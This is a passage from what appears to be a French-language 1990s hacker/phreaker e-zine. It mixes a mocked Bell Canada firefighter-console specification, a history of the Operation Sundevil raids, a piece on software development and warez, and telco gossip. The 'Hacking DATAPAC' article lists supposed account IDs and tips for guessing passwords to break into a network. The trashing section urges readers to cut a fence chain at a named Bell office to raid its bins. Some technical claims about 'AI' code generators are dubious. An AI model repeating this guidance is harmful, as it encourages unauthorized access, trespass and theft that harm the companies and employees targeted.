rsistante. Ses boutons de contrle devront tre de bonne qualit et quips d'un (LED pourpre). Ce "LED", lors d'un appel initi en poussant le bouton sur lequel il est mont, devra clignoter tant et aussi longtemps que le pompier rattach au dit bouton n'aura pas rpondu. Subsquemment lorsqu'il aura rpondu, le "LED" s'illuminera en permanence. Ainsi le prpos pourra facilement garder la liste des appels tlphoniques des pompiers qui ont t dcrochs pour rpondre l'appel. Un bouton de relchement permettra de rgnrer le systme jusqu' la prochaine intervention. Tous les LED's seront alors teints l'exception de celui qui tmoigne de la disponibilit de la console. Il s'agit ici de la seule opration qui permette d'teindre les LED's. Autrement dit, la condition des appels rpondus et non rpondus devra demeurer tant et aussi longtemps que ce bouton n'aura pas t pouss. S'il n'y a pas de contrainte technique pour le nombre de pompiers possibles, il y aura cinquante boutons pour cinquante pompiers. Si non, il y aura autant de boutons que le nombre maximum de pompiers. Cinq boutons additionnels permettront de regrouper chacun, dix pompiers reprsents a la console pour un total de cinquante pompiers. (toujours si aucune contrainte technique n'existe quand au nombre.). L'association des dix pompiers chacun des cinq boutons d,appel par groupe, devra tre facilement programmable par le prpose du client. Il pourra ainsi s'organiser lui-mme, chacun de ses cinq groupes de pompiers volontaires. Afin de fournir un compte-rendu des appels par groupes, les appels par groupes gnreront la mme opration des LED's sur chacun des boutons associs chacun des pompiers. (appels rpondus et non rpondus) Un bouton d'appel gnral devra aussi tre prvu. Celui-ci permettra d'appeler tous les pompiers rattachs la console sur la simple pression de ce bouton. Les LED's de chacun des pompiers donneront l aussi, le compte-rendu des appels rpondus. La console sera quipe d'un combin de type VLN (combin pour durs d'oreille). 2.2- LES PONTS DE CONFRENCE Les ponts de confrences devront tre contrls afin de ne permettre aucune perte rsultante totale leur sortie, suprieure a -15 dbm. (ref 600 Ohms .001 A) i.e. si la puissance d'entre au pont est de -4 db, la perte totale gnre par le pont sera gale ou infrieure 11 db. Si la dcision est prise d'utiliser un contrle de direction par dtection de la voix, il faut s'assurer de donner la priorit la console. Autrement, si le niveau de bruit chez un pompier volontaire s'avrait lev, le systme deviendrait inutilisable. Les ponts et leur circuiterie adjacente, seront monts sur des circuits enfichables de type utilis couramment dans les bureaux centraux de Bell Canada. 2.3- LES INTERFACES DE CONTRLE Les interfaces de contrle devront tre montes sur des cartes de type enfichables utilises couramment dans les centraux de Bell Canada. Elles devront tenir compte du concept (CNCA) (carrier non-compatible application) dont la fourniture ne sera plus garantie aprs le 30 avril 1993. Donc il ne faut compter sur aucun lien mtallique de bout en bout. IL FAUT QUE TOUS LES SIGNAUX UTILISES PAR LE SYSTEME, SOIENT "CARRIER COMPATIBLE". Ces interfaces pourront puiser mme l'alimentation d'urgence du central (-48v et 110v 20 hertz) Le -48v tant seulement prfiltr pour les besoins de la tlphonie, un rgulateur intgr aux systme devra tre prvu dans le circuit d'alimentation de celui-ci. Ces interfaces devront permettre l'opration de la console, tel que dcrit au paragraphe traitant de LA CONSOLE. Elles auront transfrer la ligne de l'abonn vers le systme de pompier volontaire. Deux cas sont alors possibles: a) LA LIGNE DU POMPIER EST RACCROCHE. L'interface transfert la ligne de l'abonn vers le systme de pompiers et la branche sur la sonnerie du central. Cette sonnerie ne doit pas tre entendue par la console afin de permettre la diffusion du message aux pompiers qui ont dj rpondu. Lorsque le pompier rpond sa ligne, il doit tre automatiquement branch sur le port de confrence de faon ce qu'il puisse lui aussi recevoir le message d'incendie. b) LA LIGNE DU POMPIER EST DCROCHE. L'interface met une tonalit forte sur la ligne du pompier volontaire et 15 secondes plus tard, transfert la ligne automatiquement sur le pont de confrence des pompiers volontaires. OPTIONNEL Le pompier peut empcher le transfert de sa ligne au systme de pompiers volontaires, en appuyant sur la touche "5" de son clavier "touch tone" en dea du 1 secondes. (option utile si une autre personne utilise le tlphone personnel du pompier et que celui-ci n'est pas la maison.) le pompier peut empcher le transfert de sa ligne au systme de pompiers volontaires, en donnant une impulsion sur le crochet du commutateur. (link ou flash hook) POMPIERS DISTANTS Le systme devra prvoir, la possibilit d'inclure des pompiers qui ne sont pas desservis par le mme central tlphonique que la console. 2.4- POINT DE SCURIT Il est de plus trs important qu'une forme de dialogue s'tablisse priodiquement entre la console et les cartes de contrle. Cela de faon vrifier la continuit du service du circuit tlphonique. Afin d'assurer une relve en cas de panne du dit circuit, les cartes devront pouvoir s'accommoder d'une autre ligne tlphonique comme circuit alternatif. Le transfert d'utilisation de circuit devra tre assur par la carte ou les cartes de contrle. 3- CARACTRISTIQUES Ce nouvel quipement devra remplacer adquatement le systme existant, en tenant compte des contraintes et des disponibilits techniques modernes. La fourniture des diffrentes pices devra tre garantie pour une priode suprieure dix annes. Durant cette priode de temps, il est entendu que Bell Canada s'attend ce qu'un support technique complet et efficace soit disponible rapidement. Si des sous-contrats sont accords pour assurer la fabrication de diffrentes pices d'quipement, il deviendra la responsabilit du soumissionnaire d'en assurer l'approvisionnement et la qualit. Des dlais de livraison raisonnables devront tre spcifis tant pour le nouvel quipement que pour les pices de secours commandes subsquemment. La compagnie Bell Canada, s'approprie l'exclusivit du concept et devra contrler elle-mme le partage de celui-ci avec les autres compagnies tlphoniques. Le fournisseur s'engage donc, aviser Bell canada de toutes les demandes relatives au produit en provenance d'autres compagnies. La compagnie Bell Canada, se rserve en tout temps le droit de faire fabriquer le produit par d'autres fournisseurs si elle le juge ncessaire. Donc, aucun droit particulier ne sera accord tant qua la fourniture de celui-ci. (Fin de la transcription...) Je vous pargne le reste des conneries contenues dans ce document... J'espre que le bout o "Bell s'approprie l'exclusivit" vous a fait rire autant que moi... De quelle manire pourrait-on s'amuser avec ce nouveau joujou? J'attends vos suggestions... UTILISEZ BELL, Y'A PAS LE FEU! -+( ThE CYbErPuNk BuSt )+- Part I Writer: l0gRuS! On nous accuse, nous officiers et collabos de NpC, de ne montrer que les beaux et roses cts du Hack/Phreak... Ah ouin? 01/03/90, Austin (Texas). Erik Bloodaxe (handle) est rveill par un revolver de police point vers sa tte. Bloodaxe tait CSO du Phoenix Project ([512] Tx) et un membre avou de Legion of Doom (LoD)... L'un des busts les plus publiciss et controverss de l'histoire du hack s'tait mis en branle, Opration SunDevil, le CyberPunk Bust. Pourquoi CyberPunk? You'll see.. Bloodaxe (les hackers ne sont pas cons, c'est bien connu) avait auparavant cach son meilleur quipement ailleurs. Les agents des Secret Services amricains (USSS, ou SS) sont donc repartis avec un terminal 300 Bauds, le code-source du Worm Internet de R.Morris, son tlphone, et tout ce qu'il y avait d'lectronique dans la maison. Ils se sont mme essays pour le Pac-Man en version Arcade mais il tait trop lourd, alors.. Meanwhile... Six agents des SS, un flic d'Austin et Henry Kluepfel (Who the fuck is he? Tout ce que je sais, c'est que ce mec est responsable d'un bon pourcentage des busts et des raids de pirates aux States. Le genre qu'on voudrait pas voir Qubec quoi..) pntrent dans la chambre coucher de The Mentor, les surprenant lui et sa femme en sous-vtements. The Mentor n'tait vraiment pas prt au bust (Errare Humanum Est).. Sont alls dans les poches de l'tat: Un IBM AT clone avec 4Mgs RAM et un HD de 120Mgs. Une Imprimante Laserjet ][. Un Systme d'exploitation SCO-XENIX 286, tout fait lgitime. Des disks de PageMaker et Microsoft Word La thse d'Universit de la blonde de Mentor. Le tlphone familial, etc.. La 3me Phase du CyberPunk se prparait, la finale quoi.. Mais avant, qui tait donc ce Mentor? -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Nom: Unknown Handle: The Mentor Age:???? Organisations: LoD, Phrack [Writer] Status: Mari SysOp de: -Phoenix Project -Illuminati Bbs [412] 447-4449 -+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+- Mmmm.. On sait propos de Phoenix Project mais.. Qu'est donc ce Illuminati Bbs? The Mentor tait diteur en chef et concepteur de jeu la compagnie Steve Jackson Games (SJG). Oui oui, le mme Steve Jackson qui vous fait tripper avec ses "Livres-dont-vous-tes-le-Hros" qnand vous tiez mmes. Ce mme Steve Jackson s'est plus tard parti une compagnie de Jeux de Rles (Eh oui! Encore!), ayant comme produit principal GURPS (Generic Universal Role-Playing System). Le but de GURPS tait de crer un jeu de rle polyvalent, o on pourrait par la suite y greffer tous les mondes et toutes les poques possibles et inimaginables... Il y eu donc GURPS Fantasy, pour jouer l'poque des chevaliers, GURPS Special Ops, pour aller dans la peau de votre espion favori, GURPS Space, pour voyager aux confins de l'univers.. Puis il y a eu GURPS Illuminati. Le monde de Jeu Illuminati tait un monde paranoiaque, ou les joueurs dirigeaient de sombres organisations convoitant la domination de la plante. Illuminati donnait aux joueurs le pouvoir sur le CIA, le KGB, le Ku Klux Klan, les Scouts, la compagnie de tlphone.. En gros Illuminati tait la plus grosse entreprise jamais conue, dans un territoire jamais explor... Bien vite, Illuminati dteignit sur la compagnie au complet, et on voyait des pyramides munies d'un oeil suivant les signatures des crivains, le mme symbole nigmatique au sommet des rapports de nouveaux produits, et un peu partout dans leur magazine RolePlayer. SJG s'tait donc imbib de cette athmosphre de mystre. Il tait donc normal que, quand on prit la dcision d'ouvrir un Bbs la compagnie, pour rpondre aux questions des joueurs et pour animer des discussions sur le sujet, Illuminati Bbs fut adopt comme nom. Et qui fut le 1er (et le plus qualifi) s'offrir comme SO? The Mentor.. Naturellement, rien d'illgal ne se passait sur Illuminati. Mme pas une copie de Phrack, meme pas un NpC (Ha!), rien. Quelques membres de LoD s'y retrouvaient, a oui, mais c'tait uniquement pour parler de leurs intrts Jeux-De-Rolesques, et rien d'autre.. Mais, me direz-vous, que vient faire ce Bbs dans toute l'histoire??? Trs simple: Il servira d'alibi pour le bust de Steve Jackson Games. Mais revenons notre histoire, justement... Les agents des SS se prparaient dfoncer la porte du modeste building de SJG lorsque Mentor leur offrit la clef, sachant qu'il est inutile de scrapper une porte pour rien. Les agents ont pn- tr dans l'immeuble, alors que personne encore n'tait arriv au boulot, et sont repartis avec trois ordinateurs, plusieurs HD, deux moniteurs, trois modems, une imprimante laser, tous les fichiers, E-Mail et T-files du Illuminati Bbs et le manuscrit du Supplment GURPS CyberPunk. GURPS CyberPunk.. Le dernier n de la compagnie. Un monde de jeu pour GURPS se situant dans les environs des annes 2050, un monde "High Tech, Low Life" domin par l'anarchie, les gangs, et le piratage informatique (Lire les autres article de l0gRuS! ce sujet)... Ce supplment a t crit par The Mentor, afin d'offrir un univers dcent aux autres hackers, qui pourrait y jouer sans s'touffer de rire (Comme avec bon nombre de JdR CyberPunks, que je ne nommerai pas ici). Lorsque Steve Jackson t chercher son manuscrit aux bureaux des SS, avec son avocat, on lui rpliqu que GURPS CyberPunk tait un "Manuel au crime par ordinateur"... Steve Jackson rpliqu: -" Mais ce n'est que de la Science-Fiction! " Et vous savez ce que plusieurs agents des SS lui ont rpondu??? -" Non, c'est la ralit... " Mmmm.. Le genre de phrase qui laisse rflchir, non? Surtout lorsque durant le bust: -Personne n'a t arrt.. -Personne ne fut accus d'aucun crime... -Aucune poursuite ne fut entame... -Tout le matriel saisi t gard comme "preuves" d'un crime jamais spcifi... -Le mandat de perquisition n'tait PAS SIGN... Ah! Je vous vois! Vous vous demandez tous :" Mais qu'y a-t'il dans ce fameux GURPS CyberPunk??".. Ha! Vous verrez bien dans le prochain numro, avec la suite de l'histoire du bust de STG! En attendant, qu'Arioch vous protge de Bell, fellow hackers.. l0gRuS! Bibliographie: THE HACKER CRACKDOWN: LAW AND DISORDER ON THE ELECTRONIC FRONTIER by Bruce Sterling Bantam Books, 1992 Non-fiction, 328 pp., $23 (hard-cover) ISBN 0-553-08058-X POURQUOI TOUT LE MONDE S'EN PREND A NOUS?!? MAMAN, LES PROGRAMMES POUSSENT-ILS SOUS LES CHOUX? Anatomie d'un warez par Blitzkreig Mais comment font-ils pour avoir les jeux aussi vite? On parle des babillards pirates, bien sr, et de la question qu'on nous pose bien souvent... Une autre question, ternelle litanie du jeune qui dbute, mais qui a du beat: "C'est quoi un programme beta"? En passant, a fait combien de temps que la copie beta de DOS 6.0 se promne sur les babs de Qubec? Quatre mois? Alors, chers lecteurs, aprs les abeilles et les oiseaux, voici la petite histoire de la naissance d'un logiciel... Il tait une fois... une compagnie de soft que nous baptiserons Full-o-Bugz. Un des concepteurs sous-pays de F.O.B. a soudainement une ide tout fait originale pour un soft: un nouveau jeu qu'il a d'ores et dj baptis "Revenge Of The Spotted Ninja Lemmings Streetfighters With A Tendency To Overkill". Notre gnie s'empresse d'aller voir son boss, et aprs la pipe habituelle, lui soumet son ide. Le reste, c'est, comme on dit, de l'histoire... Les "oeuvres d'un seul homme", les programmes construits par un seul programmeur ne sont plus lgion. La race de ces hommes tout faire semble s'tre teinte avec le mec (son nom m'chappe) qui avait conu, en solitaire, le clbre programme OUT OF THIS WORLD. OOTW a d'ailleurs fait date dans l'histoire des jeux. Vous qui nous lisez, vous avez srement pouss des "ho!" et des "ha!" devant le mouvement fluide des personnages et la musique excellente de la trame sonore... Mais tout a, nous l'avons dit, c'est du pass. Les compagnies ont maintenant des "teams" de dveloppeurs, quand ils n'ont pas carrment un AI leur disposition. LES A.I. La plupart des compagnies qui produisent des soft ont, soit un AI, soit une importante librairie de routines de programmation. Un AI (pour Artificial Intelligence), c'est en somme un programme (comme le systme SCUMM de LucasFilm) qui l'on dicte les paramtres fonctionnels que notre projet devrait respecter, et qui CRIT ensuite la programmation dudit projet. Clarifions encore: supposons que je veuille crer un jeu o le personnage, un pirate informatique, tire sur des employs du Bell qui arrivent par la droite du tableau, avance ou recule sa guise, et se saisit, en se penchant, des PBX bonus pour augmenter sa puissance. Je raconte tout a au AI, dans les formes, et il va m'crire les routines en assembleur, ou dans n'importe quel autre langage de mon choix, pour construire le jeu. Encore un mot sur les AI, puisque je suis sr que la plupart d'entre vous en entendez parler pour la premire fois... Les meilleurs AI de l'industrie, ma connaissance (autres que ceux conus et produits "in house", SCUMM again) sont sous licence de Texas Instruments. J'ai rcemment rencontr un reprsentant charg de la vente de ce produit, qui me racontait que les entreprises sont de plus en plus intresses par ce machin. Et pour cause: plus besoin d'analystes- programmeurs. Supposons que le Ministre du Vol du Revenu dsire un programme pour harceler les contribuables, les tapes a suivre taient auparavant les suivantes: 1) Les cadres concerns dfinissent ensemble les paramtres de fonctionnement du programme ("Me semble que le programme devrait nous permettre de faire ceci, me semble que le programme devrait nous permettre de faire cela, etc...). 2) Entrait alors en scne l'analyste-programmeur, qui prenait ces commandes, les instituait en hirarchie logique, et dfinissait les paramtres de base, pour la programmation en langage-machine. 3) Une quipe de programmeurs utilisait alors le rapport de l'analyste pour se mettre la tche et raliser le soft. Le AI, d'aprs l'expert de Texas Instruments, va pouvoir remplacer le programmeur-analyste et la majeure partie des programmeurs: chmage, everyone! L o a prenait cinq programmeurs pour raliser un soft, un seul demeurera, pour peaufiner le produit ralis par le AI. Sauf que, ma connaissance, les AI ne peuvent pas encore dessiner des backgrounds, lorsqu'il s'agit de jeux... C'est pourquoi les compagnies quipes de Development Engines (autre nom des AI) font appel des artistes et scannent maintenant les dessins ou les rotoscopient, une fois raliss. On en apprend tous les jours, hein! Aprs les robots qui fabriquent des robots, voici des programmes qui fabriquent des programmes... LES TEAMS Ceci dit, la plupart des maisons d'dition fonctionnent encore avec une librairie de routines standard, qui doivent tout de mme tre rvises et adaptes chaque nouveau produit. Vous qui vous plaignez que Origin trane de la patte avec Strike Commander, ne vous plaignez pas trop, parce que si on met trop de pression, il vont shipper un produit plein de bugs (dixit Darklands de Microprose) et il va quand mme falloir que vous courriez aprs les dix ou quinze updates qui vont suivre (Falcon 3.0, anyone?). Mais pourquoi, alors, commencent-ils ANNONCER un jeu douze mois avant qu'il ne soit prt? Ils crent de fausses attentes chez le consommateur, dites-vous. Pas ncessairement... Il faut comprendre que la logistique du placement mdia dans un magazine mensuel ou toute autre forme de publication exige que l'on s'y prenne suffisamment d'avance. Et les publicistes d'une maison de jeu se basent sur le calendrier de production du soft pour estimer la date de sortie... Et un calendrier peut tre souvent mensonger... Ŀ IDTOTALLEFTDONE%DONETASK DESCRIPTION DUE PRED Ĵ 5912h Y 100% Shape draw 12/4/90 Ĵ 6012h Y 100% Shape flip 12/4/90 Ĵ 6112h Y 100% Shape move 12/4/90 Ĵ 6212h Y 100% Shape fill 12/4/90 Ĵ 6312h Y 100% Shape shade 12/4/90 Ĵ 6430h Y 100% Document editor code 12/6/90 Ĵ 6518h Y 100% Altitude Shift display 8/1/91 Ĵ 66### ### ### 95% User interface 8/27/91 Ĵ 6742h Y 100% Menuing system core 12/10/90 Ĵ 6824h Y 100% Menuing revisions 12/5/90 Ĵ 6924h Y 100% Pulldown menu bar 12/5/9067 Ĵ 7024h Y 100% Area defs for maps/shapes/pal 12/5/90 Ĵ 7112h Y 100% Type data dialog box 12/13/90 Ĵ 7212h Y 100% Item data dialog box 12/4/90 Ĵ 7312h Y 100% NPC data dialog box 12/4/90 Ĵ 7412h 1h 0% Config file 8/27/9157 Ĵ 7512h Y 100% Spell book dialog box 5/9/91 Ĵ 76### ### ### 0% Schedule creator 8/7/91 Ĵ 7778h Y 100% Schedule entry menu 12/14/90 Ĵ 78 6h Y 100% Select NPC map location 12/3/90 Ĵ 7918h Y 100% Set game time 8/7/9121 Ĵ 8018h Y 100% Schedular revisions 12/5/90 Ĵ 8118h 6h 0% Item data set & store 8/9/9179 Ĵ 8218h Y 100% Type data set & store 12/5/90 Ĵ 8318h Y 100% NPC data set & store 12/5/90 Ĵ 8412h Y 100% Item/terrain select via TM collide 5/30/91 La grille que vous avez sous les yeux reprsente, je crois, une infime partie du calendrier de dveloppement d'un jeu que vous avez tous apprci, ELVIRA II, The Jaws of Cerberus, par Accolade. J'avais nagure ramass au dtour d'une visite sur un bab U.S... Je vous la reproduit ici pour vous permettre de saisir, en un seul coup d'oeil, l'ampleur d'une tche de programmation pour un jeu de cette magnitude. Quelques constatations peuvent d'ores et dj tires la vue d'une telle grille: 1) Un jeu informatis n'est pas une oeuvre d'art. Bien au contraire, chacune des tches est rpartie, pas ncessairement squentiellement, selon le principe du travail la chane. Le processus suit un ordre logique, mais, comme vous le voyez, la tche de la ligne 67 a t ralise AVANT celle de la ligne 66... 2) Le nombre d'heures qu'exige chaque tape semble avoir t dtermin plutt arbitrairement. On met 12 heures partout, sauf l o devient trop ridicule... 3) Le nombre de personnes travaillant chacune des tapes du projet n'est pas dtermin. On se doute bien, pourtant, que ce n'est pas une seule et mme personne qui a ralis le soft dans son entiret. On se doute aussi que deux tapes peuvent tout de mme tre ralises simultanment, puisque celui qui dessine les personnages n'est probablement pas le mme que celui qui fait les menus. Une rpartition un tant soit peu logique du travail exigerait un tel arrangement, sans compter que la polyvalence n'est pas souvent de mise dans une quipe de production: c'est pas parce que tu es capable de dessiner les lolos de Elvira que tu es capable de crer le systme pour l'inventaire des objets... Mais cessons cette analyse l, voulez-vous, et venons-en la conclusion: si ce genre de calendrier constitue l'outil principal de l'quipe de relations publiques pour les aider btir une campagne publicitaire, il n'est pas tonnant que les promesses de celle-ci ne correspondent que rarement aux promesses de celui-l... Surtout que, contrairement l'extrait que nous avons laborieusement reproduit (vivement un scanner!), les calendriers de travail fournis aux quipe de P.R. sont gnralement vierges, parce qu'ils sont distribus AU DBUT du projet, et que les heures EFFECTIVEMENT compltes ne sont pas encore entres... Un dernier mot sur la ralisation d'un soft: les versions... J'ai encore vu, rcemment, dans la messagerie d'un bab, pirate je crois, quelqu'un qui demandait ce qu'tait une version BETA... Rien de plus simple, vraiment: gnralement, ds que les dessins, les sketchs des dcors et des personnages sont complts, on tire une copie ALPHA du projet. On va retrouver sur cette copie ALPHA tous les tableaux de transition non-anims, les backgrounds des scnes o le hros va se promener, et des plans FIXES du personnage dans diverses positions et profondeurs de champ. C'est probablement de la copie ALPHA, d'ailleurs, que le premier dmo de Strike Eagle III a t tir... Ds que les animations du jeu sont prtes, et qu'un prototype fonctionnel est ralis, on en tire une copie BETA, qui sera soumise toute une srie de testeurs. C'est cette mme copie qui est distribue aux magazines habilits tester les soft pour des "first looks". Et c'est toujours cette mme copie qui atterrit gnralement sur votre bab pirate favori... et sur votre machine... Et c'est simple de comprendre pourquoi: une copie BETA circule hors de l'entreprise qui l'a produit, et elle circule entre des centaines de mains. Certaines de ces mains en profitent naturellement pour se graisser au passage en copiant la copie et en la laissant traner sur le bab WHQ d'un groupe de distribution... Mais autrement, que se passe-t-il avec cette version BETA? Les testeurs patents la triture, la maltraite, lui font subir les pires svices, tentent de garrocher les personnages au travers des armoires, bref, c'est pas la joie! Ces mmes testeurs font ensuite un rapport la compagnie sur les bugs qu'ils ont dcel. Si on peut corriger tout du premier coup, on passe la production proprement dite et la distribution du soft. Sinon, on produit une deuxime version pour fins de tests, la copie GAMMA... Mais c'est rare, avec les retards qui se sont accumuls, qu'on en vient produire une telle version. La pression des distributeurs et du public est gnralement trs grande, et les compagnies vont prfrer tenter rparer tous les bugs du premier coup, quitte, nous en avons parl en introduction, envoyer dans le champ des copies qui vont ncessiter des dizaines de rvisions... Pour mieux comprendre, en dfinitive, la diffrence qui peut exister entre une copie BETA et un produit fini, tentez de mettre la main sur la version BETA de D-GENERATION, et comparez-la avec le produit fini... Vous allez constater une GROSSE diffrence... ON SAUVE EN FRAIS DE RECYCLAGE DEPUIS QUE NPC TRASHE CHEZ NOUS! Introduction l'introduction ... Ŀ Ĵ Hacking DATAPAC Part One By: Fairy Dst Hello les mecs! Eh oui, aprs une courte absence, je me suis retrouss les manches pour vous trouver un sujet intressant... du moins, je le crois! J'ai tout dernirement lch la drogue (trop de dommages crbraux). Ca m'a permis d'exploiter un talent cach que je possdais, un talent de hacker. Eh oui, je ne me considre plus comme un drogu (en tais-je bien un ?) mais bien un hacker qui peut srement vous en apprendre un peu... Ca faisait deux semaines que je me creusait la tte pour me trouver un sujet potable, voire mme intressant (car je voulais bien entendu contribuer ce numro de NpC!). Alors j'explorais les quelques VRAIS boards o j'ai accs, mais des boards H/P, ca pousse pas partout! Ainsi, j'ai remarqu que ca brassait un peu fort conernant les DATAPACs sur The Workshop. Ouaip, ca a l'air d'intresser pas mal de monde ce systme. Alors, j'ai retrouss mes manches de camisole et je me suis mis la recherche d'informations propos de ce systme, qui est en passant desservi par le Bell lui-mme! Ce que j'ai trouv est fort intressant et vous permettera d'accder des informations fort utiles si : - Vous voulez devenir millionnaires (Sans jokes!) - Vous avez soif de donnes - Ou bien vous avez tout simplement soif de Hacker (comme moi d'ailleurs!).... Pour terminer, je vais peut-tre choquer quelques lecteurs, mais la suite de mon article se droulera en anglais, pour plaire tous... GLOSSARY DATAPAC A Nationwide, universally available, packet switching, shared, data network offered by Telecom Canada (Bell). DATAPAC 31O1 A service which enables teletypewriter compatible devices (eg. Personal Computers) to access the DATAPAC network via a public dial port. ID (Identifier) Your PROFS or CMS account name. NUI (Network User Identifier) A method of identifying a user on a DATAPAC 31O1 public dial port. PACKET/327O A software package which allows your Personal computer to access our IBM host mainframe by emulating an IBM 327O terminal. PACKET/74 A software package offered by PACKET/PC Inc., which is the IBM host mainframe interface for PACKET/327O. VTAM (Virtual Telecommunication Access Method) This is an IBM software that handles terminal data and access on our IBM host mainframe. ACCESSING THE SYSTEM First of all you must have PACKET/327O. This is a program which allows you access to the network by entering a simple command. Without it, you don't go anywhere. This program is not a public program. Only authorized persons can get this software. If you want it, work by yourself. If i get it, you can too. So good luck! We'll probably u/l a copy of it on a few H/P boards, so... Ok, once entering the system, you'll see something like this: Packet 327O Vesion 3.3.2 12/O2/88 (c) Copyright 1987, Packet/Pc Inc DATAPAC, Canada automatic logon procedure Resetting your modem... Dialing XXX-XXX at XXX baud You have a modem connection at XXX baud Connecting to DATAPAC Signing on to the host... Once you have successfully completed the access process, a screen is present with the cursor in the ID:____ field. Now, you need a PROFS and a CMS ID. PROFS ID is very simple to found. Just try numbers like: Ŀ PROFS NUMBER Ĵ 00006889 00006978 G1GX4WX4 T5YR657Y J2E5RT78 WER34ER5 GY7T67YT 418YNU8Y L9OI08UY B3F56TR6 Y1Y54R67 T6Y7RU6R 00006883 G9HKJPY4 00006881 00006884 But, to find an CMS password is more difficult. Try simple words like: GIGI, DOOM, or try any first name like RICHARD, LINDA, or anything else...You will be allowed 6 attempts to enter the proper ID and password before you are disconnected. ANY INVALID ATTEMPTS TO SIGN ON ARE RECORDED AND CHECKED BY SECURITY ADMINISTRATORS... Mais, que peut-on retrouver dans un Network comme ca? Eh bien, en premier lieu des chiffres d'affaires, des informations personnelles sur les employs et le PDG, des scoops qui vont sortir le lendemain dans le Washington Post, des crits indits, etc... Mais on ne hacke pas seulement pour les infos, mais bien pour le plaisir de le faire... Donc, je vous laisse le temps de trouver Packet/327O qui est indispensable pour connecter au Canada. D'ici l, je vous tape une belle deuxime partie contenant entre-autre les fonctions disponibles via DATAPAC (Tymnet, ect...) Goodbye and see ya in the next issue! [Blitz- Come on, Fairy! Tu es capable de nous faire quelque chose de plus consistant la prochaine fois!] LES DATAPACs? C'EST A NOUS CA?! TRASHING BELL STYLE OU LA SEMAINE VERTE par -=ThE PoSSe=- Quelques nouvelles brves sur le Bell et sur le phreak, comme a, en passant... --------- Comme vous le savez si bien, NpC frquente seulement l'lite internationale. Par hasard, un certain vendredi, lorsque nous tions en train de nous procurer notre ration bi-mensuelle de sacs verts, nous fmes surpris de rencontrer le prfr de tous. Un mec sympathique, coiff d'une tuque de la mme couleur que nos sacs. Vous avez srement tous reconnu Jon Bon Jovi. Comme quoi le trashing conduit la clbrit...Keep the faith. ---------------- Bell a instaur un programme de reconnaissance et service, appel "LE CINQ TOILES", pour rcompenser, antre autres, les bons coups de leurs employs. Quel genre de bon coup, me demanderez-vous: voici quelques exemples... INSTALLATION ET RPARATION - SUD-OUEST Steven Ligety, technicien -service d'affaires I A la suite d'une conversation avec une employe d'un tablissement en srieuse difficult financire, Steven a jug propos de communiquer l'information au groupe de la Perception - march d'affaires. Une raction immdiate s'ensuivit, qui permit de percevoir des sommes de l'ordre de 10 000 $ en un temps record et d'obtenir des garanties. Le jugement de Steven a donc protg les revenus de Bell. [Quand on vous disait que la dlation, certains avaient a dans le sang! -Blitz] VENTE ET SERVICE -MARCHE D'AFFAIRES - SUD-OUEST Marc Lapointe, reprsentant en communications La direction du groupe Perception Nord-Est tenait fliciter Marc pour sa perspicacit. Et pour cause! Jugez-en sur les propos suivants: "En fvrier '92, Marc ngociait une demande de dmnagement ainsi que l'installation d'un systme tlphonique pour un client. Une fois les efforts dploys et la vente conclue, il reoit un chque de dpt de 3 500 $. Ayant des doutes sur la solvabilit du client, Marc a communiqu avec la perception. Un appel la banque du client a confirm qu'il n'y avait pas d'argent dans le compte de banque. Marc a d annuler la commande ainsi que sa vente". Marc a prouv que mme si les ventes reprsentent la nature mme de ses fonctions, la protection des revenus est d'une gale importance. [Bon sang! Ils ont rig a en systme! -Blitz] ASSISTANCE-ANNUAIRE Denis Castonguay, assistant au service remplaant (87 Ontario) Denis a contribu dmasquer un rseau de jeunes fraudeurs qui, l'aide d'un ordinateur, s'introduisaient dans des botes vocales de Bell et d'Hydro-Qubec pour ensuite en ressortir et faire des appels d'urgence fictifs au 9-1-1 ou des appels outre- mer. Faisant preuve de doigt, il leur a fait dvoiler certains dtails qui ont par la suite permis au groupe de la Sret de remonter la filire, d'tablir des preuves et d'aviser les parents avant de dmanteler ce rseau. Bel exemple de perspicacit. [Bel exemple de connerie, oui! Qu'avaient donc ces pirates discuter avec un oprateur du Bell? Ce sont des couillons qui mritaient de se faire pincer, tiens! -Blitz] TOPS B Nancy Allaire, tlphoniste, Maurice Bliveau, conducteur semi- remorque (matriel), Guy Delorme, monteur de lignes, Manon Filion, tlphoniste, Sylvain Henry et Michel Y. Laveault, rparateurs de cbles, et Robert Rajotte, technicien -service d'affaires I Dans le cadre de la journe "Kino de l'entreprise" se tient une parade de chars allgoriques mettant en valeur les diverses activits ralises par les entreprises de la rgion de Victoriaville. Grce nos sept bnvoles, et ce pour la premire fois, un char illustrant les divers services rendus par Bell ses clientles participe au dfil et remporte le prix du plus beau vhicule allgorique. [Nul doute qu'on a d parader les fraudeurs et les mauvais payeurs sur ce char, attachs un pilori: il faut bien illustrer les services du Bell! -Blitz] On arrte l cette description tire de la revue "Le cinq toiles" (rdige par Brigitte Roberge), parce que je crois que je vais me mettre pleurer... -------------------- Pour les plus furieux trashers d'entre vous, voii notre meilleure adresse: 175 St-Sacrement... C'est le bureau de Bell responsable de l'installation dans toutes les places d'affaires, et des tlphones, et des systmes-voix, et des PBX... Des poubelles en or! Mais... la place est clture, claire, un peu inquitante, quoi. Vous n'y couperez pas, les kids, ou plutt si, vous allez devoir couper la chane qui ferme la porte grillage de la clture, si vous voulez y avoir accs. Mais a en vaut la peine: en une seule rafle, nous avons mis la main sur des quipements briss, les manuels de tous les systmes tlphoniques que le Bell vend aux compagnies, etc. A vous de juger si le jeu en vaut la chandelle... ------------------ Mine de rien, sans en parler personne (sneaky guys!), Bell a dcid de baisser le seuil de tolrance de ses factures impayes. Le CTRC a accept que Bell rclame des intrts pour des factures de 20 $ depuis le dbut de fvrier, au lieu du 50 $ qui tait le seuil prcdent. Le saviez-vous? ON N'A PLUS DE SECRET POUR VOUS. FORCEMENT... LES PBX PASSENT AU DIGITAL ROLM-CBX By Silicon Phreaker / UPI 0.00 -= DCLARATION =- Ce fichier contient des informations qui ne devraient tre considres qu' titre indicatif. Je ne saurais encourager l'application de ces techniques, car elles sont illgales. Je ne saurais donc assumer aucune responsabilit propos de l'utilisation de ces informations. -= FIN DE LA DCLARATION =- 0.50 - Table des Matires - Dclaration.............................................. 0.00 Table des Matires....................................... 0.50 Introduction............................................. 1.00 Ce qu'est un CBX......................................... 1.10 Pntrer dans un ROLM CBX................................ 1.20 Que peut-on faire une fois l'intrieur?................ 1.30 